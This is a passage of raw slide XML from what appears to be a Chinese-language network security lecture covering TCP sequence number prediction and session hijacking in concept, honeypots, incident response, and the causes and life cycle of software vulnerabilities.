              <a:t>64000</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>每次连接取序列号计数器值设置初始序列号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ISN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>因此，可以根据当前连接的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ISN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>推测下次或以后连接的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ISN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>会后劫持</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74756"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788ECCD7-880C-47B2-BC9C-64B43A21D511}"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1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>是一种安全资源，引诱黑客攻击，收集攻击相关信息或资源（恶意代码）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>黑客动物园</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>学习型：分析、学习攻击心理、方式、手段、利用漏洞等，用于技术研究机构，防御产品企业等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>应用型：部署在应用系统周边，掌握网络或系统安全状态，消耗黑客资源、分担系统安全风险</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>蜜罐不提供实际服务，其价值在于被扫描、攻击和攻陷。所有流入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>流出蜜罐的网络流量都是恶意流量，可能预示了扫描、攻击和攻陷。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>蜜罐技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82948"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D54C75E9-9CF2-4F4B-A286-F7E3C93AA484}"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1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>黑客动物园</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>吸引</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>诱骗，有攻击才能发挥作用，才有价值，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>散布敏感信息、遗留安全漏洞，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>come on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>baby</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>仿真流量，模拟用户活动，避免被黑客发现陷入蜜罐，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>baby don’t go</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>观察</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>收集信息，嗅探、日志、日志存放</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>困兽</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>控制黑客行为，避免为所欲为，避免称为攻击跳板，控制外出连接，防火墙连接限制，连接重定向</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>蜜罐技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83972"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3FE81AAE-4FF3-4B31-B934-C7C0A1927417}"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1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>单机</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>虚拟机</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>多机</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>蜜网</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>蜜罐架构</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84996"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A0C7219E-EB3E-4328-AFDE-43E8FFAEE4F6}"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1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>防不胜防，亡羊补牢</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>安全事件基本处理流程</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>发现事件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>确定影响范围，评估损失</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>执行预定的应急措施</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>安全事件通报、求援</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>网络应急响应</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86020" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchorCtr="0" compatLnSpc="1"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{166DD70C-F753-4482-820C-CCC3FF2F54BE}"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时间</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地点</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>人物</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>手段</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>事件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击环节</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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-AU" dirty="0" smtClean="0"/>
              <a:t>攻击（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-AU" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-AU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-AU" dirty="0" smtClean="0"/>
              <a:t>任何</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>违背、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-AU" dirty="0" smtClean="0"/>
              <a:t>危及信息安全的行为</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-AU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击一定是已经发生</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击的类型是多种多样的，因而是难以预测的</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>威胁（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Threat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>信息或信息系统潜在的安全漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>威胁不一定会发生</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>威胁是潜在的，因而在被利用前是很难发现的</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="593922" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Attack Vs Threat</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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rmAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>信息系统普遍存在安全漏洞，为攻击者攻击系统打开方便之门</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>信息系统的各个部分都存在安全漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>硬件：设备、组件、媒体</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>软件：操作系统、应用系统、数据库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>网络：设备、协议、系统</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>策略、人员：懈怠</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18434"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系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3C1E9910-C34A-4D29-A356-A97C78BB4C13}"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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>几乎所有的软件都存在安全漏洞，原因：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>技术：软件复杂性</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>需求缺失、设计缺陷、开发时间紧迫、软件开发工具本身的错误</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>人员：软件由人来完成，所有由人做的工作都不会完美无缺</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>人员懈怠、测试不详尽</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>成本：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>软件安全、可靠、生存性等保障需投入成本（非直接效益）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>配置、管理：管理人员惰性，缺乏安全意识，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>默认配置：为了易用，保留默认的安全配置信息。易用意味着易于闯入。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>管理员疏忽：缺省或空口令。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>临时端口：为了测试开放临时端口，事后忘记禁用。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>信任关系：建立信任关系方便资源共享，给入侵者攻击便利，只要攻破信任群中的一个机器，就有可能进一步攻击其他的机器。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="163842"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软件漏洞 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{40FB1948-0D91-416C-9187-D59653B931B0}"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pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>漏洞生命周期：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>系统（应用）发布</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>——漏洞暴露——发布</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>补丁</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>——安装补丁</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>新漏洞暴漏</a:t>
            </a:r>
            <a:r>
